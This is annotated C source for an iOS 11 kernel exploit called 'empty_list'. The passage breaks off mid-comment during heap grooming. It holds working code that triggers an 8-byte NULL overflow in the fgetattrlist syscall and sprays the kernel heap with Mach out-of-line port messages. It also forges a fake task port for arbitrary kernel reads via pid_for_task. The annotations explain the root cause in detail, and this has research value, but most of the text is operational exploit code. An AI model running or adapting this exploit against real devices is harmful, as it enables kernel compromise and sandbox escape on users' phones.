#include <sys/resource.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <mach/mach.h>
#include "sploit.h"
#include "offsets.h"
#include "kmem.h"
// Before looking into this, it is recommended to have a high- (and low-) level view of the IPC subsystem.
// Recommended reading :
// https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c10
// Mac OS X Internals - A Systems Approach : Chapter 9.3. Mach IPC: The Mac OS X Implementation
// Also, some knowledge of the internals of the iOS heap will help in understanding the "caving in" characteristic of the freelists
// https://gsec.hitb.org/materials/sg2016/D2%20-%20Stefan%20Esser%20-%20iOS%2010%20Kernel%20Heap%20Revisited.pdf
void increase_limits() {
struct rlimit lim = {0};
// Quote [ This specifies a value one greater than the maximum file descriptor number that can be opened by this process. ]
// It's raising the file descriptor limit so lots of files can be opened... but for what reason...?
// It'll become clear later that the reason for doing this is to create a whole stockpile of pipes (a couple thousand)
int err = getrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to get limits\n");
}
printf("rlim.cur: %lld\n", lim.rlim_cur);
printf("rlim.max: %lld\n", lim.rlim_max);
// The maximum value is hardcoded to 10240, as seen in the XNU source :
// #define OPEN_MAX 10240
lim.rlim_cur = 10240;
err = setrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to set limits\n");
}
lim.rlim_cur = 0;
lim.rlim_max = 0;
err = getrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to get limits\n");
}
printf("rlim.cur: %lld\n", lim.rlim_cur);
printf("rlim.max: %lld\n", lim.rlim_max);
}
#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0
void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver, uint64_t context) {
// clear the region we'll use:
memset(fake_port, 0, 0x500);
// This builds the primitive used to read from arbitrary kernel addresses.
// Refer to p.42 from "https://www.slideshare.net/i0n1c/cansecwest-2017-portal-to-the-ios-core"
// However, the function is also capable of building a fully functional kernel task port
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
// You don't need these to be set up in order to use the "pid_for_task" technique. That's why they're set to NULL in the earlier phases
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = context;
// This function also builds the fake task object. It can either be overlaid in the same memory chunk as the fake ipc_port, or reside in separate memory at "fake_task_kaddr".
uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
uint8_t* fake_task = fake_port + 0x100;
// set the ref_count field of the fake task:
*(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references
// make sure the task is active
*(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1;
// set the vm_map of the fake task:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
// set the task lock type of the fake task's lock:
*(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;
}
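// (Annotator's note) Why "initial_read_addr - 0x10" gives a read primitive, as I understand it:
// pid_for_task() on this port resolves ip_kobject to our fake task, then reads the 32-bit pid
// field out of task->bsd_info (the proc struct). On these builds the pid presumably sits at
// offset 0x10 inside struct proc, so pointing bsd_info at (initial_read_addr - 0x10) makes the
// kernel return the 4 bytes at initial_read_addr. See early_rk32() below for the usage.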
int message_size_for_kalloc_size(int kalloc_size) {
return ((3*kalloc_size)/4) - 0x74;
}
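// (Annotator's note) A rough inversion of the kernel's ipc_kmsg sizing, as I understand it:
// ipc_kmsg_alloc() reserves extra room on top of the user's message size (so 12-byte user
// descriptors can expand to 16-byte kernel descriptors, roughly size/3 more) plus the kmsg
// header/max-trailer overhead, which is where the 0x74 comes from. Worked example:
//   message_size_for_kalloc_size(0x110) = (3*0x110)/4 - 0x74 = 0xcc - 0x74 = 0x58
// i.e. a 0x58-byte message makes the kernel back it with a kalloc.0x110 ipc_kmsg.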
#define N_EARLY_PORTS 80000
mach_port_t early_ports[N_EARLY_PORTS+20000];
int next_early_port = 0;
// Allocate a whole bunch of ports. This has the added benefit of filling in all the ipc_port object holes that existed before the process started.
// These ports will be borrowed and used to spray a whole ton of kalloc.16 chunks. The reason we don't just create a fresh port each time and use that to spray
// is that creating a port triggers additional allocations, including the ipc_port object itself. In contrast, if you borrow an already existing port and just send a
// heap spray message to it, those noisy allocations are muted.
void alloc_early_ports() {
for (int i = 0; i < N_EARLY_PORTS; i++) {
kern_return_t err;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &early_ports[i]);
if (err != KERN_SUCCESS) {
printf("mach_port_allocate failed to allocate a new port for early_ports (%d)\n", i);
}
}
next_early_port = N_EARLY_PORTS-1;
}
// This borrows one of the ports from the early port pool
mach_port_t steal_early_port() {
if (next_early_port == 0) {
printf("out of early ports\n");
sleep(100);
}
mach_port_t p = early_ports[next_early_port];
next_early_port--;
//early_ports[next_early_port--] = MACH_PORT_NULL;
return p;
}
// For debugging purposes
void dump_early_ports(){
for (int i = 0; i < N_EARLY_PORTS; i++) {
printf("EARLY %d %08x\n", i, early_ports[i]);
}
}
// This is not used. The early ports persist throughout the entire exploit
void clear_early_ports() {
for (int i = 0; i < next_early_port; i++) {
mach_port_destroy(mach_task_self(), early_ports[i]);
}
}
struct kalloc_16_send_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports;
uint8_t pad[0x200];
};
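// (Annotator's note) The 0x200 pad just makes the struct at least as large as any msgh_size we
// claim below (0x58 for a kalloc.0x110 kmsg); the kernel copies in msgh_size bytes, so the
// userspace buffer has to be at least that big.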
// What this basically does is spray a single kalloc.16 chunk in memory by sending an OOL port descriptor message. Standard heap spray technique.
mach_port_t kalloc_16() {
kern_return_t err;
// take an early port:
mach_port_t port = steal_early_port();
// insert a send right:
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
uint32_t msg_size = message_size_for_kalloc_size(0x110);
// send a message with two OOL NULL ports; these will end up in a kalloc.16:
struct kalloc_16_send_msg kalloc_msg = {0};
kalloc_msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
kalloc_msg.hdr.msgh_size = msg_size; //sizeof(struct kalloc_16_send_msg);
kalloc_msg.hdr.msgh_remote_port = port;
kalloc_msg.hdr.msgh_local_port = MACH_PORT_NULL;
kalloc_msg.hdr.msgh_id = 0x41414141;
kalloc_msg.body.msgh_descriptor_count = 1;
mach_port_t ool_ports[2] = {0xffffffff, 0xffffffff};
kalloc_msg.ool_ports.address = ool_ports;
kalloc_msg.ool_ports.count = 2;
kalloc_msg.ool_ports.deallocate = 0;
kalloc_msg.ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND;
kalloc_msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
kalloc_msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
// send it:
err = mach_msg(&kalloc_msg.hdr,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
(mach_msg_size_t)msg_size,//sizeof(struct kalloc_16_send_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("sending kalloc.16 message failed %s\n", mach_error_string(err));
}
return port;
}
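// (Annotator's note) Net effect of one kalloc_16() call, as I understand it: the two 4-byte port
// names are copied in and expanded to two 8-byte in-kernel ipc_port pointers, i.e. one kalloc.16
// chunk, plus one kalloc.0x110 ipc_kmsg holding the queued message (once the per-processor kmsg
// cache runs dry). Both allocations live until discard_message() receives on the returned port.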
#define N_MIDDLE_PORTS 50000
mach_port_t middle_ports[N_MIDDLE_PORTS];
int next_middle_port = 0;
// Create a bunch of ports with send rights. One of these ports will end up as a dangling port that will be abused throughout the entire exploit
mach_port_t alloc_middle_port() {
mach_port_t port;
kern_return_t err;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // added
if (err != KERN_SUCCESS) {
printf("failed to alloc middle port\n");
}
middle_ports[next_middle_port++] = port;
return port;
}
struct ool_multi_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports[0];
};
// To free them either receive or destroy the message
mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports) {
/*
#define MACH_PORT_QLIMIT_MAX MACH_PORT_QLIMIT_LARGE
*/
// You can only send "MACH_PORT_QLIMIT_MAX = MACH_PORT_QLIMIT_LARGE" messages to a single port.
if (messages_to_send > MACH_PORT_QLIMIT_LARGE) {
printf("****************** too many messages\n");
return MACH_PORT_NULL;
}
kern_return_t err;
// A port that intentionally never receives its mach messages. This preserves the kalloc'd OOL ports arrays in kernel memory, for heap spraying.
mach_port_t port = MACH_PORT_NULL;
if (holder_port == MACH_PORT_NULL) {
// If "holder_port" is MACH_PORT_NULL, then allocate a new holder port will be used to send messages to.
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
// Insert a send right
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
if (err != KERN_SUCCESS) {
printf("failed to allocate port for hold kallocs\n");
}
// bump up the number of messages we can enqueue:
//
// ↑ Like the comment says. Bump it up to "MACH_PORT_QLIMIT_MAX", so we can spray a lot of OOL port descriptor arrays(up to MACH_PORT_QLIMIT_MAX) on a single port.
mach_port_limits_t limits = {0};
limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
err = mach_port_set_attributes(mach_task_self(),
port,
MACH_PORT_LIMITS_INFO,
(mach_port_info_t)&limits,
MACH_PORT_LIMITS_INFO_COUNT);
if (err != KERN_SUCCESS) {
printf(" [-] failed to increase queue limit\n");
exit(EXIT_FAILURE);
}
// The new holder port will be returned.
} else {
// You could also supply a port to send to
port = holder_port;
}
// these are MACH_PORT_NULL
//
// ↑ Like the comment says :
/*
#define MACH_PORT_NULL 0
*/
// calloc initializes the buffer with all zeros
mach_port_t* ports_to_send = calloc(kalloc_size/8, sizeof(mach_port_name_t));
// Calculating the size of the mach message header, body, and the message data (the trailing OOL port descriptors)
size_t message_size = offsetof(struct ool_multi_msg, ool_ports[allocs_per_message+1]);
// Allocate it, and fill the various info shortly after
struct ool_multi_msg* msg = malloc(message_size);
memset(msg, 0, message_size);
// This is required to send ool(out-of-line) messages
msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
msg->hdr.msgh_size = (uint32_t) message_size;
// The mach message is going to be sent to this port, but it won't be received immediately
msg->hdr.msgh_remote_port = port;
// We don't need to send it back to us
msg->hdr.msgh_local_port = MACH_PORT_NULL;
// Can be any random value
msg->hdr.msgh_id = 0x12340101;
// So apparently, you can send multiple OOL arrays by setting this value. This means you can kalloc several times in one single message.
msg->body.msgh_descriptor_count = allocs_per_message;
for (int i = 0; i < allocs_per_message; i++) {
// This will point to the array of port names. In the kernel, each name is converted to the real address of its ipc_port object, but what's important is that
// kalloc will allocate space to hold those addresses: exactly "kalloc_size" bytes, the function parameter we passed.
msg->ool_ports[i].address = source_ports != NULL ? source_ports : ports_to_send;
msg->ool_ports[i].count = kalloc_size/8;
// Don't let it be immediately freed
msg->ool_ports[i].deallocate = 0;
// For sending the message
msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
// This indicates that the current ool data is an ool ports descriptor, which is basically an array of ports
msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
// To actually make the kernel kalloc and copy the port array data into the kernel
// Quote [ MACH_MSG_PHYSICAL_COPY : In a sent message, this flag requires that the kernel construct an actual copy of the memory (either into wired kernel memory or default memory managed space). There is a (fairly large) limit on the amount of data that can be physically copied in a message. Port arrays always assume this option when sent. ]
msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
}
// You can enqueue multiple messages (up to MACH_PORT_QLIMIT_MAX) on a single port. So this gives us an allocs_per_message * messages_to_send heap spraying primitive.
for (int i = 0; i < messages_to_send; i++) {
// send it:
err = mach_msg(&msg->hdr,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
(uint32_t)message_size,
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("%s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
}
// Freeing these won't free the sprayed kernel kallocs; it only frees the userspace buffers.
free(ports_to_send);
free(msg);
return port;
}
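// (Annotator's note) So one hold_kallocs(kalloc_size, a, m, ...) call keeps a * m kalloc chunks of
// size kalloc_size alive on a single holder port. E.g. the freelist-lengthening call below,
// hold_kallocs(0x110, 100, 500, MACH_PORT_NULL, NULL), queues 500 messages * 100 descriptors =
// 50,000 kalloc.0x110 chunks (~13 MB), all freed at once when the holder port is destroyed.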
uint8_t msg_buf[10000];
// By receiving a message on a specific port, we can deallocate the kalloc that's attached to that specific message.
void discard_message(mach_port_t port) {
mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf;
kern_return_t err;
err = mach_msg(msg,
MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout
0,
10000,
port,
0,
0);
if (err != KERN_SUCCESS){
printf("error receiving on port: %s\n", mach_error_string(err));
}
mach_msg_destroy(msg);
}
#include <sys/attr.h>
int vfs_fd = -1;
struct attrlist al = {0};
size_t attrBufSize = 16;
void* attrBuf = NULL;
// It's setting up the attributes that trigger the overflow. The other fields are not important in themselves; they are set to guide execution towards the vulnerable code path.
// But they are required, and will become clear later in the vuln root cause analysis. The most important value here is "attrBufSize", which is 16.
void prepare_vfs_overflow() {
// You can open this even within the Safari Webcontent Sandbox
vfs_fd = open("/", O_RDONLY);
if (vfs_fd == -1) {
perror("unable to open fs root\n");
return;
}
// Why we need to set these are explained below
al.bitmapcount = ATTR_BIT_MAP_COUNT;
al.volattr = 0xfff;
al.commonattr = ATTR_CMN_RETURNED_ATTRS;
attrBuf = malloc(attrBufSize);
}
// This will do a kalloc.16, overflow out of it with 8 NULL bytes, then free it
//
// Let's track down the execution flow.
// /bsd/kern/syscalls.master :
/*
228 AUE_FGETATTRLIST ALL { int fgetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
*/
// /bsd/vfs/vfs_attrlist.c
/*
int
fgetattrlist(proc_t p, struct fgetattrlist_args *uap, __unused int32_t *retval)
{
struct vfs_context *ctx;
vnode_t vp = NULL;
int error;
struct getattrlist_args ap;
ctx = vfs_context_current();
error = 0;
if ((error = file_vnode(uap->fd, &vp)) != 0)
return (error);
if ((error = vnode_getwithref(vp)) != 0) {
file_drop(uap->fd);
return(error);
}
ap.path = 0;
ap.alist = uap->alist;
ap.attributeBuffer = uap->attributeBuffer;
ap.bufferSize = uap->bufferSize;
ap.options = uap->options;
error = getattrlist_internal(vp, &ap, p, ctx); <- our user provided arguments are passed here
file_drop(uap->fd);
if (vp)
vnode_put(vp);
return error;
}
static int
getattrlist_internal(vnode_t vp, struct getattrlist_args *uap, proc_t p, vfs_context_t ctx)
{
struct attrlist al;
struct vnode_attr va;
...
...
// Copying what we passed in from userland to kernelland
if ((error = copyin(uap->alist, &al, sizeof(al))) != 0)
goto out;
// Aha! This explains the previous attribute setting :
// al.bitmapcount = ATTR_BIT_MAP_COUNT;
// If it weren't set, then the syscall would simply bail out with EINVAL
if (al.bitmapcount != ATTR_BIT_MAP_COUNT) {
error = EINVAL;
goto out;
}
...
// There is a MAC check here. According to @niklas_b, this MAC check passes even within the Safari WebContent Sandbox
#if CONFIG_MACF
error = mac_vnode_check_getattrlist(ctx, vp, &al);
if (error)
goto out;
#endif
...
// Aha! So this is why it was setting this attribute :
// al.volattr = 0xfff;
// It's trying to let the code flow into this code block...
if (al.volattr) {
if (al.fileattr || al.dirattr || al.forkattr) {
error = EINVAL;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: mixed volume/file/directory/fork attributes");
goto out;
}
// And eventually into here
error = getvolattrlist(vp, uap, &al, ctx, proc_is64); <- Trying to enter the vulnerable function
goto out;
}
static int
getvolattrlist(vnode_t vp, struct getattrlist_args *uap, struct attrlist *alp,
vfs_context_t ctx, int is_64bit)
{
struct vfs_attr vs;
struct vnode_attr va;
// This is an important struct that is involved in the overflow. Let's see how it's defined.
struct _attrlist_buf ab;
...
...
struct _attrlist_buf {
char *base;
char *fixedcursor;
char *varcursor;
ssize_t allocated;
ssize_t needed;
attribute_set_t actual;
attribute_set_t valid;
};
// The size of the following attribute_set_t struct is 0x14 (five 4-byte attrgroup_t fields).
typedef struct attribute_set {
attrgroup_t commonattr;
attrgroup_t volattr;
attrgroup_t dirattr;
attrgroup_t fileattr;
attrgroup_t forkattr;
} attribute_set_t;
// Now back to the "getvolattrlist" function.
static int
getvolattrlist(vnode_t vp, struct getattrlist_args *uap, struct attrlist *alp,
vfs_context_t ctx, int is_64bit)
{
struct vfs_attr vs;
struct vnode_attr va;
struct _attrlist_buf ab;
...
...
...
// Aha! So that's why it set this attribute :
// al.commonattr = ATTR_CMN_RETURNED_ATTRS;
// The "return_valid" variable is used in a lot of places throughout the function, and most of the times bails out if not set to ATTR_CMN_RETURNED_ATTRS.
// Also it's actually used to trigger the vulnerability, as seen below.
return_valid = (alp->commonattr & ATTR_CMN_RETURNED_ATTRS);
pack_invalid = (uap->options & FSOPT_PACK_INVAL_ATTRS);
if (pack_invalid) {
if (!return_valid) {
error = EINVAL;
goto out;
}
...
...
...
// It's allocating the buffer that will be overflowed. See how it takes the user-supplied "uap->bufferSize" as the allocation size.
ab.allocated = imin(uap->bufferSize, fixedsize + varsize);
if (ab.allocated > ATTR_MAX_BUFFER) {
error = ENOMEM;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
goto out;
}
// It allocates it here.
MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_WAITOK); <- Remember, ab.allocated is 16. So a kalloc.16 chunk is allocated.
...
...
if (return_valid) {
ab.fixedcursor += sizeof (attribute_set_t);
// It initializes the ab.actual struct with all zeros
bzero(&ab.actual, sizeof (ab.actual));
}
...
...
...
// See. This needs to be set in order to reach the vulnerable code block.
if (return_valid) {
ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
if (pack_invalid) {
ab.actual.commonattr &= ab.valid.commonattr;
ab.actual.volattr &= ab.valid.volattr;
}
// Now here is the vulnerability.
// "ab.base" is allocated "uap->bufferSize" size, which is 0x10. But "sizeof(ab.actual)" is 0x14, and therefore, bcopying from "ab.base + sizeof(uint32_t)" by
// 0x14 amount of size will copy 8 more bytes than intended! So this would mean "ab.actual.fileattr" and "ab.actual.forkattr" will be overflowed into the adjacent chunk,
// but since only volattr was set when the syscall was invoked, those two will be unchanged from 0, and hence, two 0 DWORDs will be overflowed at the edge of ab.base.
// One might wonder, 'Why didn't you set those two values from userland so you can actually overflow user controlled values? That question can be answered by revisiting
// the "getattrlist_internal" function :
/ *
static int
getattrlist_internal(vnode_t vp, struct getattrlist_args *uap, proc_t p, vfs_context_t ctx)
{
...
...
...
if (al.volattr) {
if (al.fileattr || al.dirattr || al.forkattr) {
error = EINVAL;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: mixed volume/file/directory/fork attributes");
goto out;
}
error = getvolattrlist(vp, uap, &al, ctx, proc_is64);
goto out;
}
* /
// See. When "al.volattr" is set, others cannot be set, otherwise the syscall will bail out. So we are forced with an 8 NULL byte overflow.
// Now the vulnerability is understood. Let's go back and see what it's trying to do with these NULLs.
bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
}
*/
void do_vfs_overflow() {
int options = 0;
int err = fgetattrlist(vfs_fd, &al, attrBuf, attrBufSize, options);
//printf("err: %d\n", err);
}
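// (Annotator's note) Byte-level view of one overflow, per the analysis above:
//   ab.base is a kalloc.16 chunk, i.e. bytes [base, base+0x10).
//   bcopy writes 0x14 bytes to base+0x04, i.e. bytes [base+0x04, base+0x18).
//   bytes [base+0x10, base+0x18) spill into the next chunk: these are ab.actual.fileattr and
//   ab.actual.forkattr, which are forced to remain 0, so exactly 8 NULL bytes land on the
//   neighbouring chunk's first QWORD.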
mach_port_t initial_early_kallocs[80000];
int next_early_kalloc = 0;
mach_port_t middle_kallocs[80000];
int next_middle_kalloc = 0;
// in the end I don't use these, but maybe they help?
volatile int keep_spinning = 1;
void* spinner(void* arg) {
while(keep_spinning);
return NULL;
}
#define N_SPINNERS 100
pthread_t spin_threads[N_SPINNERS];
// These are busy threads that make the scheduler hand the CPU to this process's threads, instead of threads running in other processes on the system.
// They exist in order to minimize the chance of exterior processes claiming the CPU, so that those processes won't induce kallocs that would interfere
// with the delicate heap grooming process.
void start_spinners() {
return;
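// (Annotator's note) Note the early return above (and in stop_spinners below): the spinners are
// compiled in but disabled, matching Ian's "in the end I don't use these" comment.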
for (int i = 0; i < N_SPINNERS; i++) {
pthread_create(&spin_threads[i], NULL, spinner, NULL);
}
}
// Stop the spinning threads
void stop_spinners() {
return;
keep_spinning = 0;
for (int i = 0; i < N_SPINNERS; i++) {
pthread_join(spin_threads[i], NULL);
}
}
const int total_fds = 14*0x1f*8;
int read_ends[total_fds];
int write_ends[total_fds];
int next_pipe_index = 0;
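// (Annotator's note) The pipe creation itself happens outside this excerpt, but it has to look
// roughly like the sketch below to fill these arrays. A minimal sketch, assuming the raised
// RLIMIT_NOFILE from increase_limits() is in effect (total_fds pipes = 2 * 3472 = 6944 fds,
// comfortably under the 10240 cap); "alloc_pipes" is a hypothetical name:
/*
void alloc_pipes() {
    for (int i = 0; i < total_fds; i++) {
        int fds[2] = {-1, -1};
        if (pipe(fds) != 0) {
            perror("pipe");
            break;
        }
        read_ends[next_pipe_index] = fds[0];
        write_ends[next_pipe_index] = fds[1];
        next_pipe_index++;
    }
}
*/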
mach_port_t early_read_port = MACH_PORT_NULL;
int early_read_read_fd = -1;
int early_read_write_fd = -1;
uint64_t early_read_known_kaddr = 0;
// read_fd and write_fd are the pipe fds which have a pipe buffer at known_addr
// "prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr);"
void prepare_early_read_primitive(mach_port_t target_port, int read_fd, int write_fd, uint64_t known_kaddr) {
// This is the dangling port that's carefully set up to be used for AAR (arbitrary address read)
early_read_port = target_port;
// With the pipes, we can constantly change what's inside the fake task object's buffer
early_read_read_fd = read_fd;
early_read_write_fd = write_fd;
// The fake task object's kernel address. We can use this not only for the fake task object but for other purposes too.
early_read_known_kaddr = known_kaddr;
}
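// (Annotator's note) Why pipes, as I understand it: a write() to a pipe copies the data into a
// kalloc'd pipe buffer in the kernel, and a read() drains the data without the buffer moving.
// So the read-then-write dance in early_rk32() below rewrites the fake port/task bytes in place,
// at the same known kernel address, before every pid_for_task() call.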
uint32_t early_rk32(uint64_t kaddr) {
uint8_t* buf = malloc(0xfff);
read(early_read_read_fd, buf, 0xfff);
// We have to constantly rebuild the fake task port, because the arbitrary address we want to read has to be set up inside the fake task object
build_fake_task_port(buf, early_read_known_kaddr, kaddr, 0, 0, 0);
write(early_read_write_fd, buf, 0xfff);
uint32_t val = 0;
kern_return_t err = pid_for_task(early_read_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
printf("read val via pid_for_task: %08x\n", val);
free(buf);
return val;
}
// Two consecutive pid_for_task 32-bit reads for a QWORD read
uint64_t early_rk64(uint64_t kaddr) {
uint64_t lower = (uint64_t)early_rk32(kaddr);
uint64_t upper = (uint64_t)early_rk32(kaddr + 4);
uint64_t final = lower | (upper << 32);
return final;
}
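// (Annotator's note) Usage sketch (task_kaddr stands for some already-known kernel address, a
// hypothetical example):
//   uint64_t vm_map = early_rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
// i.e. two pid_for_task() round-trips per pointer-sized read.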
// Let's try to understand what's happening
void vfs_sploit() {
printf("empty_list by @i41nbeer\n");
// Checking that the iOS version is between 11.0 and 11.3.1, and setting up various kernel structure offsets
offsets_init();
// Creating lots of busy threads to minimize heap interference from other processes.
start_spinners();
printf("vfs_sploit\n");
// Increase maximum number of files that can be opened.
increase_limits();
size_t kernel_page_size = 0;
// How big a "Page Size" on this device?
host_page_size(mach_host_self(), &kernel_page_size);
if (kernel_page_size == 0x4000) {
printf("this device uses 16k kernel pages\n");
} else if (kernel_page_size == 0x1000) {
printf("this device uses 4k kernel pages\n");
} else {
printf("this device uses an unsupported kernel page size\n");
exit(EXIT_FAILURE);
}
// Prepare initial parameters to pass to the vulnerable syscall
prepare_vfs_overflow();
// set up the heap:
// allocate a pool of early ports; we'll use some of these later
alloc_early_ports();
if (kernel_page_size == 0x1000) {
// It's filling up the holes in the 0x10 zalloc zone for devices with 4K page size.
// This is probably because the kalloc.16 zone is a lot busier (more initial holes) than on 16K-page devices.
mach_port_t initial_kallocs_holder = hold_kallocs(0x10, 100, 100, MACH_PORT_NULL, NULL);
}
// 0x110 will be the kalloc size of the ipc_kmsg allocation for the kalloc.16 messages
// we need to ensure that these allocations don't interfere with the page-level groom,
// so ensure there's a long freelist for them
// make 30'000 kalloc(0x110) calls then free them all
//
// In the loop below, it's going to send a myriad of mach messages via "kalloc_16()". For every message sent, an "ipc_kmsg" struct will be created and held in memory
// until the message is received. Initially, "kmsg = ipc_kmsg_alloc(msg_and_trailer_size);" gets kmsg objects from a per-processor cache, but that quickly runs
// out and it starts to kalloc() 0x110 chunks continuously.
// Looking at Ian's comment below, he wants the sequence of pages to look exactly as described. If "ipc_kmsg" structs were to interfere, that order would be
// broken by random kalloc.0x110 pages in between them, which would reduce reliability. By creating an extremely long freelist of 0x110 chunks, we can ensure
// that the "ipc_kmsg" allocations stay inside that specific large freelist pool, and don't jump into newly allocated pages that are meant for kalloc.16 and ipc_ports.
// 50,000 free chunks are enough because at most around 15,000 kalloc.16 messages (each holding one 0x110 kmsg) are queued at any given time.
mach_port_t flp = hold_kallocs(0x110, 100, 500, MACH_PORT_NULL, NULL);
mach_port_destroy(mach_task_self(), flp);
// try to groom our initial pattern:
// kalloc.16 | ipc_ports | kalloc.16 | ipc_ports ...
// first off we're just trying to get the pages like that
// How many pages are we going to spray?
int INITIAL_PATTERN_REPEATS = kernel_page_size == 0x4000 ? 40 : 60;
// Leftover code, not really used anywhere.
mach_port_t kalloc_holder_port = MACH_PORT_NULL;
// Calculate the amount of allocations needed to fill exactly one page of kalloc.16 chunks, and one zcram's worth of "ipc_port" objects.
int kallocs_per_zcram = kernel_page_size/0x10; // 0x1000 with small kernel pages, 0x4000 with large
/*
struct ipc_port {
struct ipc_object ip_object;
union {
struct ipc_space *receiver;
struct ipc_port *destination;
ipc_port_timestamp_t timestamp;
} data;
ipc_kobject_t ip_kobject;
mach_port_mscount_t ip_mscount;
mach_port_rights_t ip_srights;
mach_port_rights_t ip_sorights;
struct ipc_port *ip_nsrequest;
struct ipc_port *ip_pdrequest;
struct ipc_port_request *ip_dnrequests;
unsigned int ip_pset_count;
struct ipc_mqueue ip_messages;
struct ipc_kmsg *ip_premsg;
...
...
...
int alias;
};
*/
// The ipc_port object size is 0xA8. The 4K calculation implies the ipc_port zone is crammed 3 pages at a time: 0x49 (73) ports * 0xA8 = 0x2FE8, which just fits in 0x3000.
// The 16K page calculation is kind of weird though: 0xe0 (224) ports * 0xA8 = 0x9300, which is more than one 0x4000 page..
int ports_per_zcram = kernel_page_size == 0x1000 ? 0x49 : 0xe0; // 0x3000 with small kernel pages, 0x4000 with large
// I didn't really know that zones which exhaust their freelists pick up fresh pages consecutively. Well, that seems to be the case. It's kind of an
// assumption throughout the entire exploit logic. Like Ian mentions in the above comment, he's trying to create a consecutive, interleaving pattern of allocations.
for (int i = 0; i < INITIAL_PATTERN_REPEATS; i++) {
// 1 page of kalloc
for (int i = 0; i < kallocs_per_zcram; i++) {
mach_port_t p = kalloc_16();
// Stash them away so they can be freed later
initial_early_kallocs[next_early_kalloc++] = p;
}
// 3 pages' worth of sprayed ports
for (int i = 0; i < ports_per_zcram; i++) {
// What are these middle ports used for? We'll soon find out I guess.
mach_port_t port = alloc_middle_port();
}
}
// now we hopefully have a nice arrangement of repeated fresh 'k.16 | ipc_port' pages
// to understand this next bit it's important to notice that zone allocations will come first
// from intermediate (partially full) pages. This means that if we just start free'ing and
// allocating k.16 objects somewhere in the middle of the groom they won't be re-used until
